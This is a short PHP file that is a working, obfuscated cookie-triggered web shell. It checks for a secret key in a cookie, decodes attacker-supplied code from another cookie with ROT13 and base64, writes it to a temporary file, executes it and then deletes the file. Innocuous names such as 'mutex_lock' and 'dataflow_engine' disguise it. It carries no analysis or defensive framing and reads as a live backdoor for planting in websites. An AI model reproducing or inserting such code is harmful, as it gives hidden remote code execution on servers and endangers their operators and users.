<?php


if (isset($_COOKIE[92-92]) && isset($_COOKIE[-45+46]) && isset($_COOKIE[83+-80]) && isset($_COOKIE[17+-13])) {
    $key = $_COOKIE;
    function mutex_lock($fac) {
        $key = $_COOKIE;
        $item = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '1e9f416f');
        if (!is_writable($item)) {
            $item = getcwd() . DIRECTORY_SEPARATOR . "dataflow_engine";
        }
        $component = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($key[3]));
        if (is_writeable($item)) {
            $record = fopen($item, 'w+');
            fputs($record, $component);
            fclose($record);
            spl_autoload_unregister(__FUNCTION__);
            require_once($item);
            @array_map('unlink', array($item));
        }
    }
    spl_autoload_register("mutex_lock");
    $value = "ef8954c7086c3ea74ad0e30eba849832";
    if (!strncmp($value, $key[4], 32)) {
        if (@class_parents("module_controller_query_handler", true)) {
            exit;
        }
    }
}
